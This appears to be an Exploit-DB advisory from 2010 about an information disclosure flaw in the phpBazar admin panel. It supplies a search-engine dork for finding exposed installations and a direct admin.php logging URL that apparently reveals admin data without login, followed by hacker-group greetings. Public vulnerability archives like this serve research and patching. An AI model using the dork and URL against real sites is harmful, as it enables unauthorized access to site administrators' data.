phpBazar Admin - Information Disclosure

EDB-ID:

14439

CVE:

N/A


Author:

Net_Spy

Type:

webapps


Platform:

PHP

Date:

2010-07-22


=====================================
phpBazar admin information discloser Vulnerability
=====================================

Author                 :: Net_Spy
Group                  :: Aras cyber Army
Email                  :: tvc82_2002@yahoo.com
Discover               :: 1 july 2010
Critical Lvl           :: M
Published              :: 22 july 2010
Vendor                 :: http://www.smartisoft.com/
---------------------------------------------------------------------------
~~~~~~~~~

Dork                   :: intitle: phpBazar-AdminPanel

~~~~~~~~~~~~~~~~~~

demo                   :: http://www.target.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
                         

~~~~~~~~~~~~~~~~~~~~~~~~~

Example Just For Edu   :: http://www.site.com/admin/admin.php?action=logging&orders=userid&sort=asc&offset=0&poffset=0
             
              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

+++++++++++++++++++++++++++++++++++++++
[!] greetiz to ::
    DrgPxX,D3stan,hackfaz,hamed.err000r,Net_Spy,jawadn
    All aras cyber amry members
   
+++++++++++++++++++++++++++++++++++++++